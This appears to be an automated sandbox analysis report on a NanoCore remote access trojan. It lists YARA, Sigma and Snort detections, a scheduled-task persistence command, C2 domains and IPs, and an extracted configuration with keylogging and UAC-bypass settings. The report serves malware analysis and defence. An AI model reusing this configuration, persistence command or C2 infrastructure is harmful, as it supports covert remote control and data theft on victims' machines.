13.2.RegSvcs.exe.4982365.11.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xf778:$x2: NanoCore.ClientPlugin 0x1d3c2:$x2: NanoCore.ClientPlugin 0x2d5dd:$x2: NanoCore.ClientPlugin 0x3a7e8:$x2: NanoCore.ClientPlugin 0x40d34:$x2: NanoCore.ClientPlugin 0x46cd5:$x2: NanoCore.ClientPlugin 0x507e1:$x2: NanoCore.ClientPlugin 0x5abc2:$x2: NanoCore.ClientPlugin 0x65ad6:$x2: NanoCore.ClientPlugin 0x71878:$x2: NanoCore.ClientPlugin 0x9677c:$x2: NanoCore.ClientPlugin 0xa5bc0:$x2: NanoCore.ClientPlugin 0xf7ad:$x3: NanoCore.ClientPluginHost 0x1d3e7:$x3: NanoCore.ClientPluginHost 0x2d603:$x3: NanoCore.ClientPluginHost 0x3a76c:$x3: NanoCore.ClientPluginHost 0x40cba:$x3: NanoCore.ClientPluginHost 0x46c8b:$x3: NanoCore.ClientPluginHost 0x506f7:$x3: NanoCore.ClientPluginHost 0x5ab22:$x3: NanoCore.ClientPluginHost 0x65aff:$x3: NanoCore.ClientPluginHost
13.2.RegSvcs.exe.4982365.11.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf763:$a: NanoCore 0xf778:$a: NanoCore 0xf7ad:$a: NanoCore 0x1d3c2:$a: NanoCore 0x1d3e7:$a: NanoCore 0x1d440:$a: NanoCore 0x2d5dd:$a: NanoCore 0x2d603:$a: NanoCore 0x2d65f:$a: NanoCore 0x3a4b4:$a: NanoCore 0x3a50d:$a: NanoCore 0x3a540:$a: NanoCore 0x3a76c:$a: NanoCore 0x3a7e8:$a: NanoCore 0x3ae01:$a: NanoCore 0x3af4a:$a: NanoCore 0x3b41e:$a: NanoCore 0x3b705:$a: NanoCore 0x3b71c:$a: NanoCore 0x40cba:$a: NanoCore 0x40d34:$a: NanoCore
13.2.RegSvcs.exe.4982365.11.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xf7ad:$a1: NanoCore.ClientPluginHost 0x1d3e7:$a1: NanoCore.ClientPluginHost 0x2d603:$a1: NanoCore.ClientPluginHost 0x3a76c:$a1: NanoCore.ClientPluginHost 0x40cba:$a1: NanoCore.ClientPluginHost 0x46c8b:$a1: NanoCore.ClientPluginHost 0x506f7:$a1: NanoCore.ClientPluginHost 0x5ab22:$a1: NanoCore.ClientPluginHost 0x65aff:$a1: NanoCore.ClientPluginHost 0x718a1:$a1: NanoCore.ClientPluginHost 0x967a5:$a1: NanoCore.ClientPluginHost 0xa5be5:$a1: NanoCore.ClientPluginHost 0xf778:$a2: NanoCore.ClientPlugin 0x1d3c2:$a2: NanoCore.ClientPlugin 0x2d5dd:$a2: NanoCore.ClientPlugin 0x3a7e8:$a2: NanoCore.ClientPlugin 0x40d34:$a2: NanoCore.ClientPlugin 0x46cd5:$a2: NanoCore.ClientPlugin 0x507e1:$a2: NanoCore.ClientPlugin 0x5abc2:$a2: NanoCore.ClientPlugin 0x65ad6:$a2: NanoCore.ClientPlugin
13.2.RegSvcs.exe.4b23b3a.13.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x175f:$x2: NanoCore.ClientPlugin 0xb5b3:$x2: NanoCore.ClientPlugin 0x134d9:$x2: NanoCore.ClientPlugin 0x1947c:$x2: NanoCore.ClientPlugin 0x22f8a:$x2: NanoCore.ClientPlugin 0x2d36d:$x2: NanoCore.ClientPlugin 0x38283:$x2: NanoCore.ClientPlugin 0x44027:$x2: NanoCore.ClientPlugin 0x68f2d:$x2: NanoCore.ClientPlugin 0x78373:$x2: NanoCore.ClientPlugin 0x9f978:$x2: NanoCore.ClientPlugin 0xfa340:$x2: NanoCore.ClientPlugin 0x103e4c:$x2: NanoCore.ClientPlugin 0x10e22d:$x2: NanoCore.ClientPlugin 0x119141:$x2: NanoCore.ClientPlugin 0x124ee3:$x2: NanoCore.ClientPlugin 0x149de7:$x2: NanoCore.ClientPlugin 0x15922b:$x2: NanoCore.ClientPlugin 0x16e3:$x3: NanoCore.ClientPluginHost 0xb537:$x3: NanoCore.ClientPluginHost 0x1345f:$x3: NanoCore.ClientPluginHost
13.2.RegSvcs.exe.4b23b3a.13.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x142b:$a: NanoCore 0x1484:$a: NanoCore 0x14b7:$a: NanoCore 0x16e3:$a: NanoCore 0x175f:$a: NanoCore 0x1d78:$a: NanoCore 0x1ec1:$a: NanoCore 0x2395:$a: NanoCore 0x267c:$a: NanoCore 0x2693:$a: NanoCore 0xb537:$a: NanoCore 0xb5b3:$a: NanoCore 0xde96:$a: NanoCore 0x1345f:$a: NanoCore 0x134d9:$a: NanoCore 0x18076:$a: NanoCore 0x19432:$a: NanoCore 0x1947c:$a: NanoCore 0x1a0d6:$a: NanoCore 0x22ea0:$a: NanoCore 0x22f8a:$a: NanoCore
13.2.RegSvcs.exe.4b23b3a.13.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x16e3:$a1: NanoCore.ClientPluginHost 0xb537:$a1: NanoCore.ClientPluginHost 0x1345f:$a1: NanoCore.ClientPluginHost 0x19432:$a1: NanoCore.ClientPluginHost 0x22ea0:$a1: NanoCore.ClientPluginHost 0x2d2cd:$a1: NanoCore.ClientPluginHost 0x382ac:$a1: NanoCore.ClientPluginHost 0x44050:$a1: NanoCore.ClientPluginHost 0x68f56:$a1: NanoCore.ClientPluginHost 0x78398:$a1: NanoCore.ClientPluginHost 0x9f9a1:$a1: NanoCore.ClientPluginHost 0xfa2f6:$a1: NanoCore.ClientPluginHost 0x103d62:$a1: NanoCore.ClientPluginHost 0x10e18d:$a1: NanoCore.ClientPluginHost 0x11916a:$a1: NanoCore.ClientPluginHost 0x124f0c:$a1: NanoCore.ClientPluginHost 0x149e10:$a1: NanoCore.ClientPluginHost 0x159250:$a1: NanoCore.ClientPluginHost 0x175f:$a2: NanoCore.ClientPlugin 0xb5b3:$a2: NanoCore.ClientPlugin 0x134d9:$a2: NanoCore.ClientPlugin
Click to see the 259 entries

Sigma Signatures

AV Detection

Sigma detected: NanoCore

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 7772, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud

Sigma detected: NanoCore

Source: File created

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpE45C.tmp, CommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpE45C.tmp, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentImage: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentProcessId: 7772, ParentProcessName: RegSvcs.exe, ProcessCommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpE45C.tmp, ProcessId: 7796, ProcessName: schtasks.exe

Stealing of Sensitive Information

Sigma detected: NanoCore

Source: File created

Remote Access Functionality

Sigma detected: NanoCore

Source: File created

Snort Signatures

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.2.3 - Destination IP: 212.193.30.230

Timestamp:	192.168.2.3212.193.30.23049703617152025019 05/30/23-06:22:55.049348
SID:	2025019
Source Port:	49703
Destination Port:	61715
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.2.3 - Destination IP: 212.193.30.230

Timestamp:	192.168.2.3212.193.30.23049705617152816766 05/30/23-06:23:09.678894
SID:	2816766
Source Port:	49705
Destination Port:	61715
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.2.3 - Destination IP: 212.193.30.230

Timestamp:	192.168.2.3212.193.30.23049704617152025019 05/30/23-06:23:00.991147
SID:	2025019
Source Port:	49704
Destination Port:	61715
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.2.3 - Destination IP: 212.193.30.230

Timestamp:	192.168.2.3212.193.30.23049704617152816766 05/30/23-06:23:02.678231
SID:	2816766
Source Port:	49704
Destination Port:	61715
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.2.3 - Destination IP: 192.169.69.26

Timestamp:	192.168.2.3192.169.69.2649700617152025019 05/30/23-06:22:37.625556
SID:	2025019
Source Port:	49700
Destination Port:	61715
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.2.3 - Destination IP: 212.193.30.230

Timestamp:	192.168.2.3212.193.30.23049703617152816766 05/30/23-06:22:55.907026
SID:	2816766
Source Port:	49703
Destination Port:	61715
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.2.3 - Destination IP: 212.193.30.230

Timestamp:	192.168.2.3212.193.30.23049705617152025019 05/30/23-06:23:08.061417
SID:	2025019
Source Port:	49705
Destination Port:	61715
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.2.3 - Destination IP: 192.169.69.26

Timestamp:	192.168.2.3192.169.69.2649701617152025019 05/30/23-06:22:43.112445
SID:	2025019
Source Port:	49701
Destination Port:	61715
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) - Source IP: 212.193.30.230 - Destination IP: 192.168.2.3

Timestamp:	212.193.30.230192.168.2.361715497032841753 05/30/23-06:22:55.906759
SID:	2841753
Source Port:	61715
Destination Port:	49703
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.2.3 - Destination IP: 192.169.69.26

Timestamp:	192.168.2.3192.169.69.2649699617152025019 05/30/23-06:22:32.082582
SID:	2025019
Source Port:	49699
Destination Port:	61715
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible NanoCore C2 60B - Source IP: 192.168.2.3 - Destination IP: 212.193.30.230

Timestamp:	192.168.2.3212.193.30.23049702617152025019 05/30/23-06:22:47.971581
SID:	2025019
Source Port:	49702
Destination Port:	61715
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN NanoCore RAT CnC 7 - Source IP: 192.168.2.3 - Destination IP: 212.193.30.230

Timestamp:	192.168.2.3212.193.30.23049702617152816766 05/30/23-06:22:50.317410
SID:	2816766
Source Port:	49702
Destination Port:	61715
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: december2nd.ddns.net	Avira URL Cloud: Label: malware
Source: december2n.duckdns.org	Avira URL Cloud: Label: malware

Yara detected Nanocore RAT

Source: Yara match	File source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR

Found malware configuration

Source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "72ec1ea3-16bf-4e76-a7cf-15ed5e2a", "Group": "Marcello", "Domain1": "december2n.duckdns.org", "Domain2": "december2nd.ddns.net", "Port": 61715, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Enable", "SetCriticalProcess": "Enable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Enable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}

Multi AV Scanner detection for submitted file

Source: P05jmXYKpr.exe	ReversingLabs: Detection: 70%
Source: P05jmXYKpr.exe	Virustotal: Detection: 68%			Perma Link

Multi AV Scanner detection for domain / URL

Source: december2nd.ddns.net	Virustotal: Detection: 16%	Perma Link
Source: december2n.duckdns.org	Virustotal: Detection: 19%	Perma Link
Source: december2n.duckdns.org	Virustotal: Detection: 19%	Perma Link
Source: december2nd.ddns.net	Virustotal: Detection: 16%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

ReversingLabs: Detection: 52%

Source: P05jmXYKpr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: P05jmXYKpr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: P05jmXYKpr.exe
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: RegSvcs.exe, 0000000D.00000003.467685686.0000000001C53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000D.00000000.419225570.0000000000D22000.00000002.00000001.01000000.0000000C.sdmp, RegSvcs.exe.7.dr, dhcpmon.exe.13.dr
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbj source: RegSvcs.exe, 0000000D.00000003.482399735.0000000001C53000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000003.467685686.0000000001C53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000D.00000000.419225570.0000000000D22000.00000002.00000001.01000000.0000000C.sdmp, RegSvcs.exe, 0000000D.00000002.634072543.0000000001BEA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe.7.dr, dhcpmon.exe.13.dr
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegSvcs.exe, 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegSvcs.exe, 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0095A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0096C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0097B348 FindFirstFileExA,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002BE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002BD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002CA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002CA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002C65F1 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0028C642 FindFirstFileExW,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002C7248 FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002C72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002BDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49699 -> 192.169.69.26:61715
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49700 -> 192.169.69.26:61715
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49701 -> 192.169.69.26:61715
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49702 -> 212.193.30.230:61715
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49702 -> 212.193.30.230:61715
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49703 -> 212.193.30.230:61715
Source: Traffic	Snort IDS: 2841753 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) 212.193.30.230:61715 -> 192.168.2.3:49703
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49703 -> 212.193.30.230:61715
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49704 -> 212.193.30.230:61715
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49704 -> 212.193.30.230:61715
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49705 -> 212.193.30.230:61715
Source: Traffic	Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49705 -> 212.193.30.230:61715

Uses dynamic DNS services

Source: unknown	DNS query: name: december2n.duckdns.org
Source: unknown	DNS query: name: december2nd.ddns.net

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: december2n.duckdns.org
Source: Malware configuration extractor	URLs: december2nd.ddns.net

Source: Joe Sandbox View	ASN Name: SPD-NETTR SPD-NETTR
Source: Joe Sandbox View	ASN Name: WOWUS WOWUS

Source: Joe Sandbox View	IP Address: 212.193.30.230 212.193.30.230
Source: Joe Sandbox View	IP Address: 212.193.30.230 212.193.30.230

Source: global traffic

TCP traffic: 192.168.2.3:49702 -> 212.193.30.230:61715

Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: P05jmXYKpr.exe, 00000000.00000003.381445625.0000000003082000.00000004.00000020.00020000.00000000.sdmp, P05jmXYKpr.exe, 00000000.00000003.381359513.0000000003080000.00000004.00000020.00020000.00000000.sdmp, P05jmXYKpr.exe, 00000000.00000003.380745820.0000000003080000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://google.com
